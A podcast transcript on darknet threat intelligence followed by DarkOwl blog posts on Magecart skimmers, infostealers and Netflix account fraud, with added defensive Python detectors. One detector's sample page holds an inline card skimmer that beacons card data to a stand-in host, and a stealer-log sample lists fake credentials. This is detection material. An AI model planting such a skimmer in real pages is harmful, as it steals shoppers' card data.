Richard: I’m just endlessly fascinated with the area of threat intelligence because the possibilities in terms of the size of data and the types of questions that can be asked are endless. Obviously you’ve made it clear that one of the most plausible places to look for badness is the dark web as if that really constrains the search surface, for information. How is it that you go about getting at actionable information? You mentioned a little bit about data science and other forms of magic and mysticism, but maybe you can unravel that a little bit for our listeners. Like how does that actually work out? Because the reality is the dark web, it’s a big mysterious place, right? So how do you do it?

Andrew: We have relationships with intelligence providers both in the private sector and in the government. So, you know, this may be story time. So we’ve got alerts set up. If there are specific keywords maybe mentioned, so I’m not having to read, our teams and having to read every chat in every forum across the entire internet. But we obviously care about the insurance industry a lot. There is a threat actor selling access and you know, of course they will anonymize it, right? Not give the keys to the kingdom in the advertisement. So the company was not named, but it was an insurance company, global insurance company. And what was given was the zip code. So just piecing that together and working with one of our co-founders, we were able to figure out exactly which company that was.

And for us on the security side, we are what we consider white hats. So there’s this ethical responsibility, a very focused moral compass. So we did what we considered the right thing, which is to contact this insurance company and let them know that this was going on. And it was through scouring LinkedIn to find, just doing a little open source intelligence like who works at this company in security and would even begin to understand like why I’m trying to message them. And so we were able to get in contact with ’em, this was a Sunday afternoon and it went until maybe 11 at night and they were incredibly thankful. So that was a success story. Maybe we were able to prevent an attack and sort of shut that down before it led to an extortion event.

Richard: That’s awesome.

Ann: Andrew’s insight shows how these tools are used at a firm like Resilience to stop an attack in its tracks. Alison provides two more examples of real world use cases from a more proactive perspective.

Alison: So there’s absolutely a way to look at this data set and sort of get ahead of it. And I think, you know, the most simple example would be, let’s say you’re an organization and all of a sudden next Tuesday you see that 200 of your employees email addresses are part of a, a breach or a compilation or someone, someone says on a forum, “I have 200 email addresses and plain text passwords associated with this company.” And oftentimes they’ll actually put those up as kind of proof of life. And you know, the use case there, Rich, is what are the, if you can get that sample, which we at DarkOwl would pull down and would be in our database, then it becomes a much easier reconnaissance game of instead of just saying, oh my goodness, we have content on the darknet – I don’t know what it is, I don’t know what to do about it, I don’t know how it got there. If you can pull down those email addresses and say, wow, it turns out all 200 of these employees started on September 1st, or all 200 of these employees attended a conference in Florida two months ago, or all 200 of these employees are no longer with the company. Those are three totally different incident responses. You know, one of ’em you don’t even have to deal with, right? One of ’em is, let’s go to our HR platform, why are they, they were all onboarded, but it gives you the context to then figure out what the problem is rather than waiting for it to show up on the front page of the Wall Street Journal that your organization has been subject to XYZ.

So I think the context can provide that proactive piece and allow companies to understand, and especially that definitely follows suit in regards to some of its more, you mentioned qualitative versus quantitative. Some folks are just looking at it for, in sort of the way you look at Glassdoor content, right? What are people saying about our company? Is there negative talk about it or, you know, is it notorious for being easy to break into? I mean there’s a lot that you can gather from sort of the sentiment about how people talk about organizations that can be telling too, for an organization. We do have a sector of, and this is more recent, but it’s growing quickly, of clients who are in the TPR, third party risk platform or management, where they’re looking at, think if you’re a huge organization and you’re considering all these different vendors, you kind of want to know how risky is that, do I have some that have a great deal of exposure on the darknet, which would be a leading indicator that they may not be as buttoned up as you think.

And then that same sort of use case translates really well to the M&A [mergers and acquisitions] space. So we have folks that are looking at the data in regards to potential mergers or acquisitions saying, you know, is this a company I wanna purchase or merge with? Or they get a sense for what their hygiene is in some ways.

Ann: I have one kind of funny question. Sometimes when I find myself in the DarkOwl UI, as I said, I search for myself, the next thing I do is just sort of look at people’s, pick a company that I care about. You know, I’ll just kind of browse plain text passwords. I find them endlessly entertaining to just read like a novel. Do you have any interesting or funny anecdotes about just like, things that you’ve read or seen or been entertained by in this data?

Alison: Yes, absolutely. So, you know, obviously we do a lot of demos of our platform for potential customers and we almost always search for their organization in front of them and show them what content we have. And we have had, I think I’ve been in the room for two, one of ’em was in person, one of ’em was on the phone, but two demos that were extremely embarrassing. And what I mean by that, Ann, is we searched for the organization’s email addresses that had been exposed. Those came up, there were plain text passwords associated with them for someone that was actually on the call and which happens all the time. But the part that was embarrassing is their plain text password was not something you would want.

Ann: Didn’t read it aloud?

Alison: Yeah, no, we did not read it out loud.

Ann: Amazing.

Alison: My guess was they made it as a 17 year old teenage boy and hadn’t changed it yet. So…

Ann: Or that’s what they still are on the inside.

Alison: I’ll leave it at that. So we’ve had some interesting passwords, but yeah, I agree with you. I also read through plain text passwords like a novel. I find it fascinating.

Richard: Embarrassing passwords aside, these examples show how having access to this data allows your organization to be proactive. As Alison highlighted, organizations are using it to hedge their bets on mergers and acquisitions. Another emerging use is occurring in the insurance underwriting space.

Alison: I think we’re kind of at stage one, right? If I was someone underwriting policies for a company, I would just want to know that baseline, like what does that presence look like on the darknet? And I think where we can head, which would be a really neat space to be in, is can we look at that data and then incentivize that company to better their practices, to lower the risk, lower the policy. You know, I think there’s, that’s kind of the proactive piece that I think would be, that we’re headed towards. And there’s obviously a lot of work to be done, but the data can be informative and I think you guys are doing a really nice job at using it.

Richard: Actually, that’s a great opportunity for me to ask Ann a question about how we use your data in our models. Yeah, I’m actually very curious. And you know what, I bet you other people are too.

Ann: Yeah, I mean we use it for underwriting. So we collect data and we look at the results, our models consider the results with exactly what you said Alison, the sort of understanding that the goal is that organizations are not the worst among their peer group.

As I shared, Resilience uses DarkOwl for everything from defensive measures to proactive underwriting insight. Now every business will use this information differently depending on your unique goals, but the key is to use it to your advantage. How do you make sure your company is taking the optimal steps towards cyber resilience? Andrew has some advice.

Andrew: It’s like trying to align your sort of cyber risk with your critical business functions and how those align and if it makes sense financially. To try to build a capability in-house, that is one way, right? But there are also businesses built, that have been members of the intelligence community previously or black hat types previously, that do this every day. And so paying for that as a service is another, is another option. But there is no doubt that insight to what is going on on a lot of these forums. And then sort of back to your question as well, Dr. Ann, a lot of the groups that exist, they have very specific requirements in order for you to be let in the room really, right? So sometimes it could be a proven track record of successful attacks.

So those are ways they are trying to evade obviously being on these more accessible forums. But back to your question, Rich, there are companies that are built for this. So whether or not it’s better to build an in-house capability or pay for that as a service, either way there are so many reasons why you want to know what’s going on. One, you know, is your company being targeted right now today? Do any of your credentials show up in data dumps? How do I prioritize like patching vulnerabilities? Not saying the only factor to consider is what’s being talked about, what is trending on the dark web, but that is a factor.

Richard: So let me and Ann, I have to drill in here cuz it’s like on this path of operationalizing this stuff, you know, there was the Lockheed Martin kill chain and that was fun to say, I like saying kill chain, but now there’s MITRE ATT&CK, right? And you know, you have all the STIX and TAXII and you know, the idea that log aggregators or a SIEM, whatever you like, are now, and SOAR, are being able to consume in theory this data and you have data sharing and all that stuff with the intent. I think the belief as a buyer, this is as a consumer, as a CSO, the idea is, hey, you can scale out this sort of stuff without having to have an Andrew and you can make it actionable. That rests uneasy with me. This is maybe just to my own bias, maybe you can tell me a, what sort of value do you get out of like MITRE ATT&CK, STIX and TAXII? How have you seen that get operationalized in the SIEM space or log aggregation space? What are your, again, getting back to the CSO or security person listening and thinking about how do I do this and what do I need to look out for? I know that was a big question, but there you go.

Andrew: Sure. So I would say, you know, specifically there is value in like the STIXs of the TAXIIs, right? So any specific indicator of compromise. That anything that I could ingest and automatically be able to detect or flag something specific that is known to be used by a threat actor, that’s great. Like how it all, so how you prioritize what to do first. Like that I think is where the human element comes in. Whether it’s from an incident response perspective or whether it’s trying to, for instance, stop an attack during the reconnaissance phase, like you mentioned the kill chain, so before initial access. Some of our partnerships enable us to have alerting from the intelligence community where they are sitting on the internet and they may see something like a staging sort of operation or preparations like planning being conducted to potentially target a company and then being able to alert that company. Like there’s such a human element to it. I don’t ever see the entire process being completely automated away. I mean that would be sign me up, I’ll find a nice warm beach to sit on.

Richard: Andrew’s point about humans being inseparable and paramount to this entire process, no matter how many autonomous upgrades and AI insights we add to it, is key. To illustrate how these layers of security create a strategy that works, I shared a recent story that caught my attention.

There’s an NFT loss where the, where it was guy who’s the CEO of one of these NFT processor, he had his wallet or something hacked into, he lost millions of dollars of NFT value, but he said it didn’t impact his company. Cause they have, they have multi-factor authorization. So I was just thinking about this is the practical thing when we think about customers, like if we start seeing like there’s this campaign for business email compromise, it’s associated this, we see it that it’s a long term drain by thousands of cuts, but these are the practical things that you can do as opposed to just patching, here’s some business process you can put in place. Here’s some other things you can put in place that will, you know, that yes, it’s very shift, right? But could be remedial or really impact reduction. Cause we always get so focused on what can we do that’s innovative from a technical perspective that’s important, but there’s this whole other side of responding to actual loss.

Andrew: It does seem that with novel techniques for attacking, right? Often it comes back to the same control, which, if implemented correctly, could prevent it.

Richard: Yeah, it could be hugely preventative. Yes, we can put great in-line controls in place. Yes, we can put great endpoint, yes, we can do great training, that’s good, but are there things that we can do that in theory can potentially mitigate this? It becomes harder in large organizations. Like how many people actually are able to move money around? Do you even know? And that’s, that becomes part of an attack surface, right? So that’s interesting too.

Andrew: Defense in depth – like all the different layers. It’s more than just training your folks not to click on suspicious emails. Well there’s that, but then there’s also all of these like email filtering processes you can implement as well. Not one thing is gonna be the answer, but layering. I guess I’m explaining defense in depth now too. So I think that’s the answer.

Richard: I think this is a really great, like these sorts of things that people can practically do to protect themselves coming from someone like you is just so useful. All right, Ann, ask your closing question. You’ve been so good, Andrew, you’re awesome.

Ann: Last question. At Resilience, we talk a lot about what makes a company cyber resilient. I’m curious how you would answer that question.

Andrew: So a layered approach to security. It’s not one thing, it’s a lot of layers. So for instance, in business email compromise, we were talking about how training employees to not click on suspicious links or don’t click on ads that are being served up on your real estate. If you’re on an intermediary service provider like you two, right? So it’s not about always necessarily having the highest castle walls and the moat and the drawbridge and everything, but it’s like what makes a company cyber resilient is that, you know, that you might get infiltrated, so to speak, and how can you then quickly quarantine that, get them out. So yeah, a layered approach. Defense in depth. There’s critical security controls that you just have to be a part of every organization. So, you know, it takes a village.

Ann: Alison echoes Andrew’s sentiment by acknowledging the reality that you will be attacked. Having this level of humility is essential, but how you arm yourself and stay vigilant is what will determine your success.

Alison: I think anyone who thinks they have it all figured out and are all buttoned up are the most susceptible. I think we can only strive to be better than someone behind us. I mean, the analogy I like to use is, if you’re in the woods and you run into a bear, you don’t need to outrun the bear. You just need to outrun the other person with you, right? And I think in the cyber resilience space, you don’t wanna be at the bottom of the barrel because that’s the easy pickings. And if you think you’re the best, you’re probably not. There’s always holes. So I think, staying humble and making sure that you’re doing everything you can. I guess that would be my answer.

Ann: Yeah. Awesome.

Richard: So we often talk about the need for more visibility. We’ve got a lot of telemetry on the security tools that we own. It could be scanning, it could be from penetration testing, it could be from security information event management. It could be from your insurance policies and questionnaires. Adding dark web adds a lot more information about an area of extreme uncertainty. And if we get information from there about an actual attack on a specific company or perhaps even a person and or a whole segment, we’ve just really up-leveled our ability to respond. This is why having really great context, context that’s connected across the stuff that you know empirically and the stuff you know, as possibilities and bringing that information to bear with risk transfer is so key and why it’s such a key part of what we do at Resilience.

Ann: The darknet is big, it’s diverse. There are a lot of different types of people in hoodies, not in hoodies, doing a lot of different types of things with different types of data. It’s important that we all stay realistic and humble and pay attention to what’s going on out in the internet land.

Richard: Thank you to Alison and Andrew for their time, expertise, and valuable insights. And to our production team at Come Alive Creative. Follow the Building Cyber Resilience Podcast wherever you listen so you don’t miss an episode, we’ll catch you on the next show.


Curious how darknet data applies to your use case? Contact us.

Threat Intelligence RoundUp: May

June 01, 2023

Our analyst team shares a few articles each week in our email newsletter, which goes out every Thursday. Make sure to register! This blog highlights those articles in order of what was most popular in our newsletter, that is, what our readers found most intriguing. Stay tuned for a recap every month. We hope sharing these resources and news articles emphasizes the importance of cybersecurity and sheds light on the latest in threat intelligence.

1. Hackers swap stealth for realistic checkout forms to steal credit cards – BleepingComputer

A report by Malwarebytes highlights how Magecart skimmers are hijacking real online stores' checkout pages with fraudulent but realistic-looking payment forms to steal credit card data. The fake forms are displayed as modal HTML overlays convincingly superimposed on the original page. The injected checkout form is sophisticated and in some cases looks more legitimate than the store's real one, so the shopper has no visual cue that card data is leaving the site.
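The skimmer pattern described above (an off-origin form in a fixed-position overlay, a third-party script, or inline code that reads the card fields and beacons them elsewhere) is cheap to check for in a page capture. The scanner below is an added example, not DarkOwl's or Malwarebytes' code; the checkout page it parses is constructed for the example and the first-party origin `SHOP_ORIGIN` is an assumed value.

```python
"""Flag Magecart-style injections in a checkout page.

Added example for this roundup entry; it is not DarkOwl or Malwarebytes code.
It parses a constructed (fake) checkout page and reports scripts and forms
that would move card data off the shop's own origin, plus the fixed-position
overlay that a modal skimmer form sits in. SHOP_ORIGIN is an assumed value.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

SHOP_ORIGIN = "https://shop.example"  # assumed first-party origin of the store

# Constructed sample: the shop's real form, then an injected fixed-position
# overlay whose form posts to an attacker host, a third-party script, and an
# inline skimmer that reads the real card fields and beacons them out.
SAMPLE_PAGE = """
<html><body>
<form id="checkout" action="/checkout/pay" method="post">
  <input name="cc_number"><input name="cvv">
</form>
<div id="overlay" style="position:fixed;top:0;left:0;width:100%;height:100%">
  <form action="https://static-cdn.example.org/collect" method="post">
    <input name="card"><input name="cvv"><input name="exp">
  </form>
</div>
<script src="https://shop.example/js/app.js"></script>
<script src="https://static-cdn.example.org/jquery.min.js"></script>
<script>
document.querySelector('#checkout').addEventListener('submit', function () {
  var d = {n: document.forms[0].cc_number.value, c: document.forms[0].cvv.value};
  new Image().src = 'https://static-cdn.example.org/i.gif?d=' + btoa(JSON.stringify(d));
});
</script>
</body></html>
"""

CARD_FIELD = re.compile(r"\b(cc_?number|card(number)?|cvv|cvc|exp(iry)?)\b", re.I)
URL_IN_JS = re.compile(r"https?://[^\s'\"]+")
OVERLAY_CSS = re.compile(r"position\s*:\s*fixed", re.I)


def is_foreign(url, origin):
    """True when url (absolute or relative) resolves to an origin other than origin."""
    p = urlparse(url)
    if not p.scheme and not p.netloc:  # relative URL stays on the page's origin
        return False
    o = urlparse(origin)
    return (p.scheme.lower(), p.netloc.lower()) != (o.scheme.lower(), o.netloc.lower())


class SkimmerScanner(HTMLParser):
    def __init__(self, origin):
        super().__init__()
        self.origin = origin
        self.findings = []
        self._in_inline_script = False
        self._div_stack = []      # True for each open <div> that is a fixed overlay
        self._overlay_depth = 0

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and is_foreign(a.get("action") or "", self.origin):
            where = "inside a fixed-position overlay" if self._overlay_depth else "in page"
            self.findings.append(f"form posts to foreign origin {a['action']} {where}")
        elif tag == "script":
            src = a.get("src")
            if src is None:
                self._in_inline_script = True
            elif is_foreign(src, self.origin):
                self.findings.append(f"third-party script {src}")
        elif tag == "div":
            overlay = bool(OVERLAY_CSS.search(a.get("style") or ""))
            self._div_stack.append(overlay)
            self._overlay_depth += overlay

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline_script = False
        elif tag == "div" and self._div_stack and self._div_stack.pop():
            self._overlay_depth -= 1

    def handle_data(self, data):
        # Inline script that touches card fields and names an off-origin URL.
        if self._in_inline_script and CARD_FIELD.search(data):
            for url in URL_IN_JS.findall(data):
                if is_foreign(url, self.origin):
                    self.findings.append(f"inline script reads card fields and sends to {url}")


def scan_checkout(html, origin=SHOP_ORIGIN):
    """Return the list of findings for one page."""
    scanner = SkimmerScanner(origin)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for finding in scan_checkout(SAMPLE_PAGE):
        print("ALERT:", finding)
```

Run against the sample it reports three findings: the overlay form posting to the foreign host, the third-party script, and the inline beacon. The same three checks map onto a Content-Security-Policy (`form-action`, `script-src`, `connect-src`/`img-src` limited to the shop's origin), which is the preventive control; the scanner is the detective one you run against production page captures.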

2. ViperSoftX info-stealing malware now targets password managers – BleepingComputer

The most recent version of the ViperSoftX infostealer has been observed targeting password managers including KeePass and 1Password, alongside updated and more robust detection-evasion methods. The malware installs a malicious browser extension called VenomSoftX into Chrome, Brave, Edge, and Opera. According to Trend Micro, it has targeted consumer and enterprise victims in the U.S., Italy, Brazil, India, Australia, Japan, Taiwan, Malaysia, and France. Analysts report that the malware is distributed as software cracks, activators, and key generators, hiding inside otherwise innocuous-looking software. A standout feature of the new version is the byte mapping it uses for code encryption, which remaps and reorders the shellcode bytes.

3. Stealthy MerDoor malware uncovered after five years of attacks  – BleepingComputer

A newly identified Advanced Persistent Threat (APT) group named Lancefly has been using a custom, stealthy backdoor called “Merdoor” to target organizations in South and Southeast Asia since 2018. The initial access method is unclear, but Symantec has observed the group using phishing emails, SSH credential brute forcing, and other techniques. Merdoor is loaded into the legitimate Windows processes perfhost.exe or svchost.exe through DLL side-loading. The backdoor persists across reboots and connects to a C2 server, from which it receives instructions.
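DLL side-loading leaves a distinctive trace in image-load telemetry: either the trusted host binary is running from somewhere it should not be (a copied perfhost.exe next to the malicious DLL), or a genuine host loads a DLL from a user-writable path. The hunt below is an added example, not Symantec's or DarkOwl's code. Its input is a constructed set of Sysmon-style Event ID 7 records flattened to one `key=value;` line each; that flat format is an assumption for the example, not Sysmon's native XML.

```python
"""Hunt for DLL side-loading into Windows system binaries.

Added example for this roundup entry; it is not Symantec's or DarkOwl's code.
The records below are constructed and approximate Sysmon Event ID 7
(ImageLoad) data flattened to one 'key=value; key=value' line each; that
flat format is an assumption for the example, not Sysmon's native XML.
"""
from pathlib import PureWindowsPath

# Host binaries named in the Symantec report as Merdoor side-loading targets.
WATCHED_HOSTS = {"perfhost.exe", "svchost.exe"}
# Directories where a genuine copy of those binaries and their DLLs live.
TRUSTED_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\windows\winsxs")

# Constructed log: two benign loads, a copied perfhost.exe in ProgramData
# loading a DLL beside it, a genuine svchost.exe loading a DLL from a
# user-writable path, and an unrelated process-creation event.
SAMPLE_EVENTS = r"""
EventID=7; Image=C:\Windows\System32\svchost.exe; ImageLoaded=C:\Windows\System32\kernel32.dll; Signed=true; SignatureStatus=Valid
EventID=7; Image=C:\Windows\System32\perfhost.exe; ImageLoaded=C:\Windows\System32\perfctrs.dll; Signed=true; SignatureStatus=Valid
EventID=7; Image=C:\ProgramData\Adobe\perfhost.exe; ImageLoaded=C:\ProgramData\Adobe\version.dll; Signed=false; SignatureStatus=Unavailable
EventID=7; Image=C:\Windows\System32\svchost.exe; ImageLoaded=C:\Users\Public\wlbsctrl.dll; Signed=false; SignatureStatus=Unavailable
EventID=1; Image=C:\Windows\explorer.exe; CommandLine=explorer.exe
"""


def parse_event(line):
    """'k=v; k=v' -> dict; tolerates '=' inside values (command lines)."""
    fields = {}
    for part in line.split(";"):
        part = part.strip()
        if "=" in part:
            key, value = part.split("=", 1)
            fields[key.strip()] = value.strip()
    return fields


def in_trusted_dir(path):
    parent = str(PureWindowsPath(path).parent).lower()
    return any(parent == d or parent.startswith(d + "\\") for d in TRUSTED_DIRS)


def flag_sideload(event):
    """Return a reason string if the load looks like side-loading, else None.

    Three checks, in order of confidence: a watched binary running from a
    non-system directory (a copied host), a watched binary loading a DLL from
    a non-system directory, and a watched binary loading an unsigned DLL.
    """
    if event.get("EventID") != "7":
        return None
    image, loaded = event.get("Image", ""), event.get("ImageLoaded", "")
    if PureWindowsPath(image).name.lower() not in WATCHED_HOSTS:
        return None
    if not in_trusted_dir(image):
        return f"{image} is running outside a system directory (copied host binary)"
    if not in_trusted_dir(loaded):
        return f"{image} loaded {loaded} from a non-system directory"
    if event.get("Signed", "").lower() != "true":
        return f"{image} loaded unsigned DLL {loaded}"
    return None


def hunt(log_text):
    """Run every line through flag_sideload and return the reasons that fired."""
    hits = []
    for line in log_text.splitlines():
        reason = flag_sideload(parse_event(line))
        if reason:
            hits.append(reason)
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print("SIDELOAD?", hit)
```

The two constructed malicious lines fire and the benign ones do not. In a real deployment the watched-host set would be wider (any signed Microsoft binary known to be abused for side-loading), and the unsigned-DLL check should be tuned against a baseline, since some legitimate software ships unsigned DLLs.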

4. BouldSpy Android Spyware: Iranian Government’s Alleged Tool for Spying on Minority Groups – The Hacker News

Lookout has attributed, with moderate confidence, an Android malware family called BouldSpy (named DAAM by Cyble) to the Law Enforcement Command of the Islamic Republic of Iran. Victims of the malware include minority groups such as “Kurds, Baluchis, Azeris, and Armenian Christian groups.” The intrusion vector appears to be physical access to the device. Operators control infected devices from a C2 panel and can build additional malicious apps disguised as harmless ones, such as a currency converter. Among its more notable features, the malware disables battery-management features so that the operating system never kills its background process. It also incorporates a component from the open-source CryDroid project, which could indicate that the malware is still under development or that the component is being used as a false flag.

5. Bad Magic’s Extended Reign in Cyber Espionage Goes Back Over a Decade – The Hacker News

The threat actor Bad Magic (aka Red Stinger) has been linked to new cyberattacks targeting companies in the Russo-Ukrainian conflict area, but also to activity going back to May 2016, meaning this actor has been operating for far longer than originally thought.

6. Malicious Windows kernel drivers used in BlackCat ransomware attacks – BleepingComputer

According to Trend Micro, the ALPHV ransomware group (aka BlackCat) has been observed using an improved version of the signed malicious Windows kernel driver known as “POORTRY” to evade detection by security software while conducting its attacks.


Make sure to register for our weekly newsletter to get access to what our analysts are reading on a weekly basis.

Netflix Password Policy: Cybersecurity Angle

May 26, 2023

Netflix’s recently implemented password-sharing policy is drawing widespread complaints of corporate greed and profit-margin padding, but have you considered how much cybersecurity factored into the decision?

In this blog, DarkOwl analysts highlight password sharing concerns, use DarkOwl Vision to look at current darknet activity targeting Netflix accounts, and predict how the new policy may affect fraud.

Cybersecurity Concerns

The importance of password hygiene and password protection is no secret. It is a constant topic in security training and across the security community, and every day brings news of another commercial data or app breach. At this point, everyone should assume their email address and/or password has been leaked on the darknet or deep web.

Credentials are among the most sought-after and frequently exchanged digital goods in the darknet economy. Large sets of compromised accounts are often combined and re-shared across multiple darknet and deep web forums, including darknet-adjacent platforms such as Telegram. Criminals use this data in a variety of ways. For example, a credential-cracking or “stuffing” tool can cross-reference leaked email addresses against other password lists, or guess passwords from common conventions, and then test each combination against live services to confirm which email-and-password pairs still work.
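The defender's counterpart to a stuffing list is checking each password an employee sets against the leaked corpus without ever sending the password anywhere. The code below is an added example, not DarkOwl code: it reproduces the k-anonymity range query that Have I Been Pwned's Pwned Passwords service uses (only the first five hex characters of the SHA-1 leave the client), run entirely offline against a small constructed corpus, and it also applies the “common convention” guess a stuffing tool makes (strip a trailing year or symbol, lowercase the rest) so that a trivial variant of a leaked password is caught too.

```python
"""Check passwords against a leak corpus without revealing them.

Added example for the credential-stuffing discussion above; it is not
DarkOwl code. It reproduces the k-anonymity range-query scheme used by
Have I Been Pwned's Pwned Passwords service, but entirely offline against a
small constructed corpus, and adds the 'common convention' guess that
stuffing tools make (strip a trailing year or symbol, lowercase the rest).
"""
import hashlib
import re

# Constructed leak corpus; in practice this is the stuffing list the attacker
# bought or the breach corpus the defender subscribes to.
LEAKED_PASSWORDS = ["password", "123456", "Netflix2023!", "qwerty", "letmein", "password"]

MANGLE = re.compile(r"[\d!@#$%^&*._-]+$")   # trailing year/counter/symbol


def sha1_upper(text):
    return hashlib.sha1(text.encode("utf-8")).hexdigest().upper()


# Server side: suffixes grouped under a 5-hex-char prefix, with a count.
def build_range_index(passwords):
    index = {}
    for pw in passwords:
        digest = sha1_upper(pw)
        bucket = index.setdefault(digest[:5], {})
        bucket[digest[5:]] = bucket.get(digest[5:], 0) + 1
    return index


def range_query(index, prefix):
    """What the service returns: every (suffix, count) sharing the prefix."""
    return dict(index.get(prefix.upper(), {}))


# Client side: only the 5-char prefix leaves the machine; matching is local.
def times_leaked(password, index):
    digest = sha1_upper(password)
    return range_query(index, digest[:5]).get(digest[5:], 0)


def normalize(candidate):
    """Undo the usual mangling: 'Password2024!' -> 'password'."""
    return MANGLE.sub("", candidate).lower()


def exposure(password, index):
    """('exact', n) if leaked as-is, ('variant', n) if a trivial variant of a
    leaked password, else ('clean', 0)."""
    n = times_leaked(password, index)
    if n:
        return ("exact", n)
    base = normalize(password)
    if base and base != password:
        n = times_leaked(base, index)
        if n:
            return ("variant", n)
    return ("clean", 0)


def audit(credentials, index):
    """credentials: iterable of (username, password); returns the exposed ones."""
    results = []
    for user, pw in credentials:
        status = exposure(pw, index)
        if status[0] != "clean":
            results.append((user, status))
    return results


if __name__ == "__main__":
    idx = build_range_index(LEAKED_PASSWORDS)
    users = [("alice@example.com", "Netflix2023!"),
             ("bob@example.com", "Password2024!"),
             ("carol@example.com", "correct horse battery staple")]
    for user, result in audit(users, idx):
        print(user, result)
```

With the real service the prefix narrows the response to a few hundred suffixes out of hundreds of millions, which is what makes the query safe to send; the variant check is the part to wire into a password-change hook, since “Password2024!” passes most complexity rules while being the first thing a stuffing tool tries.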

Netflix Targeted on the Darknet

Most of us are guilty of it: sharing a streaming account password with friends and family. After all, there are so many streaming services, and we want access to them all. We also know that password sharing is bad practice, because it lets various types of threat actors gain unauthorized access to a Netflix account. According to Dark Reading:

  • “Sharing a password undermines control over who has access to an account, potentially leading to a greater risk of unauthorized use and account compromise;
  • Once shared, a password can be further distributed or changed, locking out the original user;
  • Worse yet, if the shared password is used across multiple accounts, a malicious actor could gain access to all of them;
  • And sharing passwords can also make users more susceptible to phishing and social engineering attacks.”

Netflix is regularly targeted on the darknet. DarkOwl analysts are currently closely watching to see what happens to unauthorized account access after the new password policy.

Currently we see Netflix targeted in the following ways:

Netflix Stealer Logs

Stealer logs are harvested by threat actors using a category of malware known as info stealers, such as Raccoon and RedLine, and the stolen credentials are then used to gain unauthorized access to online accounts. Below is an example DarkOwl analysts found on Russian Market (a successor to the Genesis market).

Source: DarkOwl Vision
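A stealer log of the kind sold on Russian Market is, at bottom, a text dump of saved browser credentials, one block per site. The triage below is an added example, not DarkOwl Vision code: it parses a constructed log that approximates the URL/Username/Password/Application blocks RedLine- and Raccoon-style logs write (real logs vary in field names and order, so the parser keys on labels rather than line position), pulls out the credentials for watched domains, and flags passwords the victim reused across sites, since those are what a stuffing tool will try next.

```python
"""Triage a stealer log for a watched brand's accounts.

Added example for the stealer-log discussion above; it is not DarkOwl Vision
code. The log below is constructed and approximates the URL/Username/
Password/Application blocks that RedLine- and Raccoon-style logs write;
real logs vary in field names and order, so the parser keys on labels,
not line position.
"""
import re
from collections import defaultdict
from urllib.parse import urlparse

SAMPLE_LOG = """\
URL: https://www.netflix.com/login
Username: jane.doe@example.com
Password: Winter2023!
Application: Google Chrome (Default)
===============
URL: https://accounts.google.com/signin
Username: jane.doe@example.com
Password: Winter2023!
Application: Google Chrome (Default)
===============
URL: https://www.netflix.com/login
Username: jane.doe@example.com
Password: Winter2023!
Application: Microsoft Edge (Default)
===============
URL: https://vpn.corp.example/sslvpn
Username: jdoe
Password: C0rpVPN-2023
Application: Mozilla Firefox
"""

FIELD = re.compile(r"^(URL|Username|Password|Application)\s*:\s*(.*)$", re.I)


def parse_stealer_log(text):
    """Return one dict per credential block, keyed by lowercase field name."""
    entries, current = [], {}
    for raw in text.splitlines():
        line = raw.strip()
        match = FIELD.match(line)
        if match:
            current[match.group(1).lower()] = match.group(2).strip()
        elif line.startswith("===") and current:   # block separator
            entries.append(current)
            current = {}
    if current:
        entries.append(current)
    return entries


def registrable_domain(url):
    """Crude eTLD+1: good enough for .com-style hosts used in the sample."""
    host = (urlparse(url).hostname or "").lower()
    parts = host.split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host


def triage(text, watched_domains):
    """Return ({watched domain: {(username, password)}}, {reused credentials}).

    Credentials are deduplicated across browsers, and a credential that the
    victim used on more than one site is reported as reused, since that is
    exactly what a stuffing tool will try next.
    """
    by_domain = defaultdict(set)
    sites_for = defaultdict(set)
    for entry in parse_stealer_log(text):
        if "url" not in entry or "username" not in entry:
            continue
        domain = registrable_domain(entry["url"])
        cred = (entry["username"], entry.get("password", ""))
        sites_for[cred].add(domain)
        if domain in watched_domains:
            by_domain[domain].add(cred)
    reused = {cred for cred, sites in sites_for.items() if len(sites) > 1}
    return dict(by_domain), reused


if __name__ == "__main__":
    hits, reused = triage(SAMPLE_LOG, {"netflix.com", "corp.example"})
    for domain, creds in hits.items():
        print(domain, sorted(creds))
    print("reused elsewhere:", sorted(reused))
```

The sample yields one Netflix credential (the same login saved in two browsers collapses to one), one corporate VPN credential, and one reused password. For a brand-protection team the watched set is the brand's domains; for an enterprise it is the corporate SSO and VPN hosts, and a hit is grounds for an immediate reset regardless of whether the log's other entries look relevant.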

Selling Netflix Accounts

The vendor below was found selling a Netflix account for $4.95 USD on a traditional darknet marketplace, ASAP Market.

Source: DarkOwl Vision

Netflix Full Access Accounts

DarkOwl analysts found Netflix full access accounts being offered on Telegram as a way to bypass 2FA. The post below shows a Telegram user selling various types of Netflix logins priced in rupees, suggesting these threat actors are from or living in India.

Conclusion

DarkOwl analysts predict that Netflix’s updated password-sharing policy will likely cut down much of the fraud observed on Telegram markets, where people sell someone else’s Netflix account for as little as a few dollars. However, cybercriminals are becoming ever more sophisticated and creative, and it will not take long for fraudsters to find new ways to continue their activity and reap financial benefits. The DarkOwl analyst team is observing the darknet and taking notes. Keep an eye out for part 2, once the policy has been in place longer, for an update on darknet activity targeting Netflix.



Cyber Risk Modeling

May, 2023

Over the past few years there has been an increase in global cyberattacks, with reports indicating that overall attacks were up 38% in 2022 compared to the previous year. In the U.S. alone there was a 57% increase, while the U.K. experienced a 77% increase. Many of these attacks result in data breaches and ransomware incidents, which cost organizations time and money and carry long-term effects such as reputational damage.

On top of this, the average cost of a data breach has reached a record high of $4.35 million, and the average cost of a ransomware attack is $4.54 million, not including any ransom payment. With cyberattacks on the rise, organizations need better intelligence to model risk and take mitigating action, particularly small businesses, which are three times more likely to be targeted.

Darknet data is a key source of insight into criminal and other nefarious activity. The darknet, or dark web, is a layer of the internet that cannot be reached with a standard browser. Sensitive corporate information is regularly leaked or sold there, and these data sets can be used to identify cybersecurity threats and calculate organizational risk. Understanding that risk lets an organization better prepare for potential threats.



Track Your Relative Risk on the Darknet

May, 2023

With cyberattacks on the rise, organizations need better intelligence to safeguard themselves, their employees, and their customers from incidents such as data breaches and ransomware attacks. This rise in illicit cyber activity only increases the need to protect against these attacks and to estimate their likelihood.
